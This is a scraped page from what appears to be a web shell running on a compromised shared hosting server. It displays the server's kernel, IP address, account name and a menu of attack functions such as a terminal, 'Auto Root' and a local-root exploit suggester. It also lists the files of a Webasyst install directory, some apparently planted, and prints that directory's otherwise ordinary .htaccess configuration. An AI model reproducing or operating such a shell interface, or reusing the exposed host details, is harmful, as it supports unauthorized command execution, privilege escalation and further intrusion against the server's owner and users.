Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.149
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
webasyst /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
php53
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
php56
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
php71
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
php81
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
php82
[ DIR ]
drwxr-xr-x
2026-07-30 12:18
.htaccess
14
B
-rw-r--r--
2021-12-22 22:54
SystemConfig.class.php
157
B
-rw-r--r--
2021-12-22 22:54
_.htaccess
1.49
KB
-rw-r--r--
2026-02-16 23:40
__thumb.php
196
B
-rw-r--r--
2026-07-29 18:07
_htaccess
142
B
-rw-r--r--
2026-02-16 23:40
_thumb.php
192
B
-rw-r--r--
2026-07-29 18:07
all_fields_order.php
398
B
-rw-r--r--
2026-02-16 23:40
apps.php
237
B
-rw-r--r--
2026-02-16 23:40
company_fields_order.php
567
B
-rw-r--r--
2026-02-16 23:40
config.php
158
B
-rw-r--r--
2024-04-23 23:14
custom_fields.php
29.3
KB
-rw-r--r--
2026-02-16 23:40
db.php
238
B
-rw-r--r--
2026-04-06 19:28
edit.php
4.21
KB
-rw-r--r--
2026-07-29 18:58
edit.xml
433
B
-rw-r--r--
2021-12-22 22:54
fileindex.php
189
B
-rw-r--r--
2026-02-16 23:40
import.php
2.9
KB
-rw-r--r--
2026-07-29 18:58
info.xml
3.42
KB
-rw-r--r--
2026-07-29 18:07
install.js
924
B
-rw-r--r--
2021-12-22 22:54
install.php
16
KB
-rw-r--r--
2026-07-29 18:58
install.xml
1007
B
-rw-r--r--
2021-12-22 22:54
mail.php
81
B
-rw-r--r--
2025-02-12 20:31
md5
3.09
KB
-rw-r--r--
2026-07-29 18:58
notes.txt
1.28
KB
-rw-r--r--
2026-02-16 23:40
person_fields_order.php
1.52
KB
-rw-r--r--
2026-02-16 23:40
plugins.php
73
B
-rw-r--r--
2026-06-16 20:44
robots.txt
214
B
-rw-r--r--
2026-02-16 23:40
routing.php
1.4
KB
-rw-r--r--
2026-07-29 18:07
search.php
29.52
KB
-rw-r--r--
2026-06-16 20:44
services.php
3.98
KB
-rw-r--r--
2026-04-06 19:28
thumb.php
185
B
-rw-r--r--
2026-07-29 18:07
update_antibot.php
2.67
KB
-rw-r--r--
2026-02-16 23:40
waid.php
615
B
-rw-r--r--
2026-02-16 23:40
Save
Rename
<FilesMatch "\.md5$"> Deny from all </FilesMatch> DirectoryIndex index.php Options -Indexes # Comment the following line, if option Multiviews not allowed here Options -MultiViews AddDefaultCharset utf-8 <ifModule mod_rewrite.c> RewriteEngine On # Uncomment the following line, if you are having trouble #RewriteBase / # if request js file from ROOT RewriteCond %{REQUEST_URI} ^\/?[^\/]+\.js$ [or] # or if NOT request certain static file from anywhere RewriteCond %{REQUEST_URI} !\.(js|css|jpg|jpeg|gif|png|svg|ttf|eot|otf|woff|woff2)$ [or] # or if request apple-touch-icon.png icon RewriteCond %{REQUEST_URI} apple-touch-icon\.png$ [or] # or if other conditions for webdav and caldav are passed RewriteCond %{REQUEST_METHOD} ^(POST|PUT|COPY|MOVE|DELETE|PROPFIND|OPTIONS|MKCOL)$ [or] RewriteCond %{HTTP:Translate} ^.+$ [or] RewriteCond %{HTTP_USER_AGENT} ^(DavClnt|litmus|gvfs|davfs|wdfs|WebDAV|cadaver|Cyberduck) # or if file doesnt' exist RewriteCond %{REQUEST_FILENAME} !-f # or if directory doesnt' exist RewriteCond %{REQUEST_FILENAME} !-d # dispatch it to index.php RewriteRule ^(.*)$ index.php [L,QSA] </ifModule> <ifModule mod_headers.c> <FilesMatch "\.(jpg|jpeg|png|gif|js|css|svg|ttf|eot|otf|woff|woff2)$"> Header set Cache-Control "max-age=3153600, public" </FilesMatch> </ifModule> <ifmodule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L] </ifmodule>